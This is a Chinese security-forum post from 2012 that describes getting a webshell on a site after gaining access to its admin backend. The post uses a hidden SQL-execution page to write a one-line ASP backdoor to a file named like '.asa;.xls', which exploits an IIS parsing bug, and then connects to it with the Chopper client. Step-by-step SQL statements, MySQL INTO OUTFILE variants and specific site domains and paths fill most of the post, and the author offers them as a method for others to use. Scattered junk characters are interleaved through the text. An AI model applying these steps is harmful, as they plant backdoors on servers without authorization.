找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1960|回复: 0
打印 上一主题 下一主题

ACCESS执行SQL命令导出一句话SHELL

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:53:58 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
好不容易进了后台,发现啥上传啊。备份啊多木有。8 p+ A. B% F3 n0 [. z
webshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的
+ p# V7 |( a1 q* A. V文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,
8 T# I2 V8 S) c& T# d然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:( T# ~0 o8 o' I7 H7 K# A8 e7 q
1.create table cmd (a varchar(50))1 X  B1 y2 l6 ~7 K* N, X5 y
2.insert into cmd (a) values (‘‘)
6 z- F1 d, _4 W& I! k4 r/ I3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd
6 u/ @+ U0 y( l3 i7 B5 }; C(把表cmd的内容导出为物理路径的一个EXCEL文件)% f# x- i* r+ _+ Q! _0 q5 N1 Z
4.drop table cmd1 w+ B* s/ y0 l: O3 g4 O8 C5 P
利用IIS的BUG成功拿到了WEBSHELL。4 c. ^" \* O, W* |

, S5 N4 Q; ]6 E! `( v/ x3 @" i直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话3 _9 z1 U; ~& Q7 g
' O( D2 @( t, ^/ b& s8 o" [
  SQL语句意思解释:: l8 n8 ?+ ~$ l4 s0 z1 S# }; \
  第一句
* C  s3 J) i% d- k4 ^! S  建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50/ h1 m5 ?- \! ?7 {7 }

% W7 o" L4 c, w1 q5 l( j  第二句
4 y4 Y, x" G2 ^3 k, u- z; A+ B" F  在表cmd的a字段插入一句话木马
+ W1 [: _$ q  S! K  第三句
" p) p  U6 D; V( f; s3 r  把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件
8 F' E2 ?  Z0 ~. ?% ?
, u$ X' P/ O  O7 n5 Z. [  第四句$ `, W: \, ]. }- _9 G9 |
  删除建立的cmd表
8 W! j% [& w9 p  m/ e
% M+ p0 j5 k* F6 B1 |2 N7 F  以下内容为测试:0 Q5 Q" Q, p+ C+ i+ i) m
  Access利用后台SQL执行命令功能导出WebShell:
' o0 ?' o- t) ^2 }  这个更简单:+ ]  Q) {2 X# P  c" {
  [ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]
, {% [% |' V- k; U8 Y  t' q; U" ]  或者
9 f  T4 o% ]% ?" j5 u3 c2 b: {  [ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]  h* {$ H* `+ ^  m" ]

. q1 u: ?' z5 i  k  后台有执行SQL语句功能(vote为已知表段)( k! k* H! \: A9 u* E! v: I
  希望对大家有所帮助拿shell的又一个思路
) t  y& U. C/ i) [) G
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表